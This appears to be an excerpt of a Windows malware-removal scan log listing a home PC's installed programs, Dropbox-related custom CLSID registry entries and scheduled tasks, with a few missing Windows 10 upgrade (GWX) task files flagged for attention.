Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Bing Bar (HKLM-x32\...\{3365E735-48A6-4194-9988-CE59AC5AE503}) (Version: 7.3.132.0 - Microsoft Corporation)
Bing Rewards Client Installer (x32 Version: 16.0.345.0 - Microsoft Corporation) Hidden
Blackhawk Striker 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Blasterball 3 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Blio (HKLM-x32\...\{8D3903E2-4B1B-4A69-B8F6-A3D1BE075BDB}) (Version: 2.2.6484 - K-NFB Reading Technology, Inc.)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Bounce Symphony (x32 Version: 2.2.0.95 - WildTangent) Hidden
Build-a-lot 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cake Mania (x32 Version: 2.2.0.95 - WildTangent) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
CyberLink DVD Suite Premium (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3210 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dokan Library 0.5.3 (HKLM-x32\...\DokanLibrary) (Version:  - )
Dora's World Adventure (x32 Version: 2.2.0.95 - WildTangent) Hidden
Dropbox (HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Dropbox) (Version: 13.4.21 - Dropbox, Inc.)
DVD Menu Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{FB4BB287-37F9-4E27-9C4D-2D3882E08EFF}) (Version: 4.2.4412 - Hewlett-Packard)
DVD Menu Pack for HP MediaSmart Video (x32 Version: 4.2.4412 - Hewlett-Packard) Hidden
Elements 9 Organizer (x32 Version: 9.0 - Adobe Systems Incorporated) Hidden
Elements STI Installer (x32 Version: 1.0 - Adobe Systems Incorporated) Hidden
Elevated Installer (x32 Version: 4.0.15.0 - Garmin Ltd or its subsidiaries) Hidden
Escape Rosecliff Island (x32 Version: 2.2.0.95 - WildTangent) Hidden
Farm Frenzy (x32 Version: 2.2.0.95 - WildTangent) Hidden
FATE (x32 Version: 2.2.0.95 - WildTangent) Hidden
Final Drive Nitro (x32 Version: 2.2.0.95 - WildTangent) Hidden
Garmin BaseCamp (HKLM-x32\...\{36A0D446-B8E9-4753-BDFE-335F6F4DE59C}) (Version: 4.5.2 - Garmin Ltd or its subsidiaries)
Garmin Express (HKLM-x32\...\{50755d67-ae60-4e47-b3d6-ce44d01b5a95}) (Version: 4.0.15.0 - Garmin Ltd or its subsidiaries)
Garmin Express (x32 Version: 4.0.15.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express Tray (x32 Version: 4.0.15.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin USB Drivers (HKLM\...\{DC7720F2-98BE-41C1-B0A8-E391362E86B8}) (Version: 2.3.1.1 - Garmin Ltd or its subsidiaries)
Google Earth (HKLM-x32\...\{817750FA-EC6A-485D-9901-0683AE6FFDF1}) (Version: 7.1.5.1557 - Google)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
GoPro (Version: 0.1.2733 - GoPro, Inc.) Hidden
GoPro for Desktop (HKLM-x32\...\{88734dc7-c200-4ad3-b29f-bb5e436cb30f}) (Version: 1.4.0.2733 - GoPro, Inc.)
GoPro Studio (x32 Version: 5.9.2733 - GoPro, Inc.) Hidden
Heroes of Hellas 2 - Olympia (x32 Version: 2.2.0.95 - WildTangent) Hidden
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.1.5 - WildTangent)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 4.2.4725 - Hewlett-Packard)
HP MediaSmart Music (HKLM-x32\...\InstallShield_{91A34181-9FAD-43AB-A35F-E7A8945B7E1C}) (Version: 4.2.4517 - Hewlett-Packard)
HP MediaSmart Photo (HKLM-x32\...\InstallShield_{6DAF8CDC-9B04-413B-A0F2-BCC13CF8A5BF}) (Version: 4.2.4513 - Hewlett-Packard)
HP MediaSmart SmartMenu (HKLM\...\{A40F60B1-F1E1-452E-96A5-FF97F9A2D102}) (Version: 3.1.2.4 - Hewlett-Packard)
HP MediaSmart Video (HKLM-x32\...\InstallShield_{D12E3E7F-1B13-4933-A915-16C7DD37A095}) (Version: 4.2.4522 - Hewlett-Packard)
HP MediaSmart/TouchSmart Netflix (HKLM-x32\...\{2EA3D6B2-157E-4112-A3AB-BF17E16661C3}) (Version: 1.0.4.0 - Hewlett-Packard)
HP MovieStore (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0.2 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Remote Solution (HKLM-x32\...\HP Remote Solution) (Version: 1.1.14.0 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{53469506-A37E-4314-A9D9-38724EC23A75}) (Version: 8.4.4400.3525 - Hewlett-Packard Company)
HP Setup Manager (HKLM-x32\...\{AE856388-AFAD-4753-81DF-D96B19D0A17C}) (Version: 1.0.12844.3519 - Hewlett-Packard Company)
HP Support Assistant (HKLM-x32\...\{EE202411-2C26-49E8-9784-1BC1DBF7DE96}) (Version: 7.0.39.15 - Hewlett-Packard Company)
HP Support Information (HKLM-x32\...\{7F2A11F4-EAE8-4325-83EC-E3E99F85169E}) (Version: 10.1.1000 - Hewlett-Packard)
HP Update (HKLM-x32\...\{DE77FE3F-A33D-499A-87AD-5FC406617B40}) (Version: 5.002.003.003 - Hewlett-Packard)
HP Vision Hardware Diagnostics (HKLM\...\{D79A02E9-6713-4335-9668-AAC7474C0C0E}) (Version: 2.1.6.0 - Hewlett-Packard)
Hulu Desktop (HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\HuluDesktop) (Version: 0.9.13 - Hulu LLC)
Internet TV for Windows Media Center (HKLM-x32\...\{9D318C86-AF4C-409F-A6AC-7183FF4CF424}) (Version: 4.2.2.0 - Microsoft Corporation)
iTunes (HKLM\...\{93F2A022-6C37-48B8-B241-FFABD9F60C30}) (Version: 12.1.2.27 - Apple Inc.)
Java 8 Update 40 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218040F0}) (Version: 8.0.400 - Oracle Corporation)
Jewel Quest Solitaire 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kobo (HKLM-x32\...\Kobo) (Version: 1.6 - Kobo Inc.)
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.3130 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.3130 - CyberLink Corp.) Hidden
LAV Filters 0.67 (HKLM-x32\...\lavfilters_is1) (Version: 0.67 - Hendrik Leppkes)
LightScribe System Software (HKLM-x32\...\{FD7F0DB8-0E96-4D64-AD4D-9B5A936AF2A8}) (Version: 1.18.20.1 - LightScribe)
MeAndMyDocs Upload Application (HKLM-x32\...\com.meandmydocs.Uploader.087FDEB77484A5AAF08430117BC2012EB6372029.1) (Version: v1 - UNKNOWN)
MeAndMyDocs Upload Application (x32 Version: 1 - UNKNOWN) Hidden
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUSR) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Theme Pack for HP MediaSmart Video (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 4.2.4412 - Hewlett-Packard)
Movie Theme Pack for HP MediaSmart Video (x32 Version: 4.2.4412 - Hewlett-Packard) Hidden
Mozilla Firefox 49.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 49.0.2 (x86 en-US)) (Version: 49.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 49.0.2.6136 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MySQL Server 5.6 (HKLM\...\{56DA0CB5-ABD2-4318-BEAB-62FDBC9B12CC}) (Version: 5.6.10 - Oracle Corporation)
Mystery P.I. - The London Caper (x32 Version: 2.2.0.95 - WildTangent) Hidden
NetObjects Fusion Essentials (HKLM-x32\...\NetObjects Fusion Essentials) (Version:  - )
Norton 360 (HKLM-x32\...\N360) (Version: 22.8.0.50 - Symantec Corporation)
Norton Online Backup (HKLM-x32\...\{40A66DF6-22D3-44B5-A7D3-83B118A2C0DC}) (Version: 2.1.17869 - Symantec Corporation)
NVIDIA 3D Vision Controller Driver 352.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 352.65 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 361.91 - NVIDIA Corporation)
NVIDIA Display Control Panel (HKLM\...\NVIDIA Display Control Panel) (Version: 6.14.12.5936 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.9.1.35 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.9.1.35 - NVIDIA Corporation)
NVIDIA Graphics Driver 361.91 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 361.91 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.15.0428 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.15.0428 - NVIDIA Corporation)
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
PDF Complete Special Edition (HKLM-x32\...\PDF Complete) (Version: 4.0.57 - PDF Complete, Inc)
Penguins! (x32 Version: 2.2.0.95 - WildTangent) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.7717 - CyberLink Corp.)
PhotoNow! (x32 Version: 1.1.7717 - CyberLink Corp.) Hidden
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.8 - Google, Inc.)
PictureMover (HKLM-x32\...\{264FE20A-757B-492a-B0C3-4009E2997D8A}) (Version: 3.5.0.33 - Hewlett-Packard Company)
Plants vs. Zombies (x32 Version: 2.2.0.95 - WildTangent) Hidden
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
PlayReady PC Runtime x86 (HKLM-x32\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Superstars III (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Bowler (x32 Version: 2.2.0.95 - WildTangent) Hidden
Polar Golfer (x32 Version: 2.2.0.95 - WildTangent) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4329 - CyberLink Corp.)
Power2Go (x32 Version: 6.1.4329 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3129 - CyberLink Corp.)
PowerDirector (x32 Version: 8.0.3129 - CyberLink Corp.) Hidden
PressReader (HKLM-x32\...\{912CED74-88D3-4C5B-ACB0-13231864975E}) (Version: 5.10.1102.0 -  NewspaperDirect Inc.)
QuickTime 7 (HKLM-x32\...\{3D2CBC2C-65D4-4463-87AB-BB2C859C1F3E}) (Version: 7.76.80.95 - Apple Inc.)
RAIDXpert (HKLM-x32\...\InstallShield_{8B76B8E9-F773-4B75-A08C-120079EB765E}) (Version: 3.2.1540.10 - AMD)
RAIDXpert (x32 Version: 3.2.1540.10 - AMD) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.3219 - CyberLink Corp.) Hidden
RoxioNow Player (HKLM-x32\...\{0EDEB615-1A60-425E-8306-0E10519C7B55}) (Version: 1.9.5.101 - RoxioNow)
Samsung Kies3 (HKLM-x32\...\InstallShield_{88547073-C566-4895-9005-EBE98EA3F7C7}) (Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.)
Samsung Kies3 (x32 Version: 3.2.15072.2 - Samsung Electronics Co., Ltd.) Hidden
Seagate Dashboard (HKLM-x32\...\{EA266F00-A8E7-43A0-8DED-FBFE3F076934}) (Version: 4.4.1902.0 - Seagate)
Seagate Manager Installer (HKLM-x32\...\InstallShield_{E6F019F1-DFB6-4853-A87D-6E31624755A9}) (Version: 2.02.0109 - Seagate)
Seagate Manager Installer (x32 Version: 2.02.0109 - Seagate) Hidden
Serif DrawPlus Starter Edition (HKLM-x32\...\{33311EA4-0ECA-4E7F-83E5-8A92CD760152}) (Version: 2.0.2.010 - Serif (Europe) Ltd)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{91140000-0011-0000-0000-0000000FF1CE}_Office14.PROPLUSR_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
SHIELD Streaming (Version: 4.1.0260 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.9.1.35 - NVIDIA Corporation) Hidden
SketchUp 2014 (HKLM-x32\...\{F246092E-FA0B-47C8-9D3E-CF8C210293C8}) (Version: 14.1.1282 - Trimble Navigation Limited)
SketchUp 2015 (HKLM\...\{319CD380-1AAB-4CAD-BE1D-59189A780FA6}) (Version: 15.2.685 - Trimble Navigation Limited)
SketchUp 8 (HKLM-x32\...\{8EB62C87-AAA6-4850-A5BC-64155884B973}) (Version: 3.0.16846 - Trimble Navigation Limited)
Spotify (HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Spotify) (Version: 0.8.5.1356.gd1d40f3a - Spotify AB)
TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)
TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
VFW_Codec32 (x32 Version: 0.1.160.0 - GoPro, Inc.) Hidden
VFW_Codec64 (Version: 0.1.160.0 - GoPro, Inc.) Hidden
Virtual Families (x32 Version: 2.2.0.95 - WildTangent) Hidden
Virtual Villagers 4 - The Tree of Life (x32 Version: 2.2.0.95 - WildTangent) Hidden
VLC media player 2.1.3 (HKLM-x32\...\VLC media player) (Version: 2.1.3 - VideoLAN)
VVMapping - Great Lakes Snowmobile & ORV GPS Maps v8.0.0 (HKLM-x32\...\VVMapping-Great_Lakes_SMORV v8.0.0_is1) (Version:  - )
VVMapping - Great Lakes Snowmobile & ORV GPS Maps v8.1.0 (HKLM-x32\...\VVMapping-Great_Lakes_SMORV v8.1.0_is1) (Version:  - )
VVMapping - Great Lakes Snowmobile & ORV GPS Maps v8.5.0 (HKLM-x32\...\VVMapping-Great_Lakes_SMORV v8.5.0_is1) (Version:  - )
VVMapping - Great Lakes Snowmobile & ORV GPS Maps v8.6.0 (HKLM-x32\...\VVMapping-Great_Lakes_SMORV v8.6.0_is1) (Version:  - )
VVMapping-SouthernMichigan - GPS Maps v1.02 (HKLM-x32\...\VVMapping-SouthernMichigan_is1) (Version:  - )
Wheel of Fortune 2 (x32 Version: 2.2.0.95 - WildTangent) Hidden
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Media Center Add-in for Flash (HKLM-x32\...\{E2D09AC2-4153-4817-AAEB-24F92A8BCE88}) (Version: 4.1.2.0 - Microsoft Corporation)
Windows Media Center Add-in for Silverlight (HKLM-x32\...\{0EDBEB2B-7C8D-42E6-8312-0F84394A3223}) (Version: 4.7.3.0 - Microsoft Corporation)
Zinio Reader 4 (HKLM-x32\...\ZinioReader4.9310D8F796442B71068C511E15D70529A702D19D.1) (Version: 4.0.3184 - Zinio LLC)
Zinio Reader 4 (x32 Version: 4.0.3184 - Zinio LLC) Hidden
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Harold\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Harold\AppData\Roaming\Dropbox\bin\DropboxExt64.1.0.dll (Dropbox, Inc.)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0160ED31-5220-41EC-8724-CBCFE2248FD0} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-10-29] (Adobe Systems Incorporated)
Task: {01C1C091-B946-4D37-8C08-55A22A140C66} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\SymErr.exe [2016-09-23] (Symantec Corporation)
Task: {01F2C80E-E979-43C8-AC1D-3BABF8D8A274} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-08-13] (Google Inc.)
Task: {0614E216-9586-4DC9-9417-9663E71FFA81} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {09DD22EA-249F-4834-94E9-2F324E944E0D} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {0E8551ED-005D-40C6-90E3-80D5843F8DBB} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {182548B4-34C3-493B-9E25-80E7BECB6AEE} - System32\Tasks\{80D68447-CC1E-4AC0-8C98-D29AFA292270} => pcalua.exe -a C:\Users\Harold\Downloads\NOF-Essentials.exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {22C8C8A8-23E6-448B-8E77-3211AED6E650} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {22FFE13E-C15D-4B3B-A16B-60A57C7B2132} - System32\Tasks\{87239E00-682D-4EAE-B5F4-625C0E465C4E} => C:\Program Files (x86)\NetObjects\NetObjects Fusion Essentials\Fusion.exe [2009-05-15] (NetObjects)
Task: {24CF2868-3518-4830-ADEB-81A5230BD173} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {27C411B7-E322-486B-938E-48EF225CFC07} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2917EE86-583E-4CED-848E-79DC2A6287E0} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {2CDF6509-9A37-4B6F-8CF0-D07109B5CB92} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton 360\Upgrade.exe [2016-09-23] (Symantec Corporation)
Task: {2F0B2903-9F5B-4E96-8394-51698C1980DD} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {34006911-CE15-4B85-9356-3B8566C49416} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-09-27] (Hewlett-Packard Company)
Task: {3691FF85-D708-409B-BE7A-284ADA2BCFB2} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {392AAB2B-15F7-48B1-B07E-0BE480D834F6} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4174D0B1-D662-4442-BE05-E74FDA7AB687} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {426D89B7-22E3-4132-B434-C26049460A35} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
